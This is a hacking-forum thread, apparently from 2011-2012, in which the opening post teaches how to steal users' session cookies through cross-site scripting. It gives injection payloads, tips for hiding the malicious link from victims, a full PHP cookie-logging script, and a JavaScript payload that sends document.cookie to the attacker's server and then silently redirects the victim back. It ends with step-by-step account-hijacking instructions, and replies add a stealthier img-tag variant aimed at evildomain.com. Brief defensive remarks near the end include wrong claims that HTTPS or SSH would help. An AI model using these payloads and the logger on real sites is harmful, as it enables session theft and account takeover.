Author Topic: Stealing Cookie With XSS  (Read 13855 times)

0 Members and 1 Guest are viewing this topic.

Offline 1Mirek

  • Serf
  • *
  • Posts: 22
  • Cookies: -5
  • #!/usr/bin/perl
    • View Profile
    • Liquid-Security
Stealing Cookie With XSS
« on: August 06, 2011, 08:14:53 am »
I guess you already know a bit of the theory behind XSS, so we'll get right to the code.

Let's say a web page has a search function that uses this code:
Code: [Select]
<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>
We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

Code: [Select]
<script>alert("test")</script>
When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

Code: [Select]
<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>
Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

Code: [Select]
"><script>alert("test")</script>
This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example.

Code: [Select]
http://www.site.com/search.php?q="><script>alert("test")</script>
Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here: http://centricle.com/tools/ascii-hex/

Hexing the query of this url gives us

Code: [Select]
http://www.site.com/search.php?q= "><script>alert("test")<%2 fscript>

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

Code: [Select]
<?php 

function GetIP() 

    if (
getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        
$ip getenv("HTTP_CLIENT_IP"); 
    else if (
getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        
$ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (
getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        
$ip getenv("REMOTE_ADDR"); 
    else if (isset(
$_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
        
$ip $_SERVER['REMOTE_ADDR']; 
    else 
        
$ip "unknown"
    return(
$ip); 


function 
logData() 

    
$ipLog="log.txt"
    
$cookie $_SERVER['QUERY_STRING']; 
    
$register_globals = (bool) ini_get('register_gobals'); 
    if (
$register_globals$ip getenv('REMOTE_ADDR'); 
    else 
$ip GetIP(); 

    
$rem_port $_SERVER['REMOTE_PORT']; 
    
$user_agent $_SERVER['HTTP_USER_AGENT']; 
    
$rqst_method $_SERVER['METHOD']; 
    
$rem_host $_SERVER['REMOTE_HOST']; 
    
$referer $_SERVER['HTTP_REFERER']; 
    
$date=date ("l dS of F Y h:i:s A"); 
    
$log=fopen("$ipLog""a "); 

    if (
preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>"); 
    else 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 
    
fclose($log); 


logData(); 

?>

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

Code: [Select]
"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie="   document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

Code: [Select]
logData();
?>


to this:

Code: [Select]
logData();

echo '<b>Page Under Construction</b>'
?>

Now when you open log.txt, you should see something like this:

Code: [Select]
IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0. Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php | 

DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373


You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.


1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.
« Last Edit: August 06, 2011, 09:21:04 am by 1Mirek »

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #1 on: August 06, 2011, 08:05:27 pm »
I like loading a IMG tag with the php script's URL better than redirecting the entire thing. Simply making a 1x1 transparent image once the PHP script is done loading. Makes it slightly more silent.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline Scream

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #2 on: February 04, 2012, 01:14:07 am »
nice .... thanks :)

Offline TJSmiffy

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #3 on: February 11, 2012, 05:38:38 pm »
ok, so I followed this pretty much exactly and found my target site etc. but the one thing I can't do is find a decent server hoster where I can link my file properly. I get stuck with this: javascript:submitBrowseForm('/','something.php','downloadfile',''); as the link. tried multiple things but any ideas?

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #4 on: February 11, 2012, 05:44:07 pm »
ok, so I followed this pretty much exactly and found my target site etc. but the one thing I can't do is find a decent server hoster where I can link my file properly. I get stuck with this: javascript:submitBrowseForm('/','something.php','downloadfile',''); as the link. tried multiple things but any ideas?

I do not think submitBrowseForm('/','something.php','downloadfile',''); is a valid javascript command.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline TJSmiffy

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #5 on: February 11, 2012, 05:46:26 pm »
that's what i was thinking, i only want the actual link to my document though, which keeps reffering me to this

Offline fruitcake2212

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: Stealing Cookie With XSS
« Reply #6 on: June 26, 2012, 10:26:33 pm »
I like loading a IMG tag with the php script's URL better than redirecting the entire thing. Simply making a 1x1 transparent image once the PHP script is done loading. Makes it slightly more silent.

This seems a nice trick
The image must be inside a <script> tag for this to work? (cos we need document.cookie)

edit: nice tut 1Mirek btw
« Last Edit: June 26, 2012, 11:10:03 pm by fruitcake2212 »

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #7 on: June 28, 2012, 12:15:09 am »
This seems a nice trick
The image must be inside a <script> tag for this to work? (cos we need document.cookie)

edit: nice tut 1Mirek btw

This is a rather old thread but okay.

The idea is to XSS a <img src="http://evildomain.com/image.php?cookie=derp" />
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline fruitcake2212

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: Stealing Cookie With XSS
« Reply #8 on: June 30, 2012, 06:03:43 am »
Yeah sorry I thought it was not worth to start a new thread for this lil question

but... wouldn't it look more like this? : <img src="http://evildomain.com/image.php?cookie=" + document.cookie />

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #9 on: June 30, 2012, 06:11:11 pm »
Yeah sorry I thought it was not worth to start a new thread for this lil question

but... wouldn't it look more like this? : <img src="http://evildomain.com/image.php?cookie=" + document.cookie />


Yes, exactly. But make sure the + document.cookie is inside the quotes tho.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline fruitcake2212

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: Stealing Cookie With XSS
« Reply #10 on: July 01, 2012, 02:46:53 am »
make sure the + document.cookie is inside the quotes tho.

thanks, I wasn't sure about that

Offline Pythonista

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #11 on: July 01, 2012, 08:03:16 am »
So we know how to steal a session cookie, so what would could the victim do to prevent this from happening? Any links or suggestions? I'm sure HTTPS would make this more difficult, but what else could they do that we need to take into consideration?

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: Stealing Cookie With XSS
« Reply #12 on: July 01, 2012, 09:56:39 am »
HTTPS is one thing that is secure enough. SSH tunneling is another thing that could be used...

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #13 on: July 01, 2012, 05:13:59 pm »
So we know how to steal a session cookie, so what would could the victim do to prevent this from happening? Any links or suggestions? I'm sure HTTPS would make this more difficult, but what else could they do that we need to take into consideration?

The victim cannot do anything (in most cases). The site owner(s) on the other hand can fix the XSS flaw.

HTTPS wouldent do anything. This is NOT a HTTP flaw, this is a code flaw. If anyone is to blame its lazy and unknowledgeable coders.

@Kulverstukas, SSH wouldent make any difference either.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline h4ppy_4rtist

  • Serf
  • *
  • Posts: 35
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #14 on: July 02, 2012, 05:33:18 pm »
The insertion of those scripts wouldn't work if the victim uses extensions like adblock or just disabled javascript... But against the method with img-tag or something similar the victim is helpless, as said before..
[[ We're all some kind of artists. ]]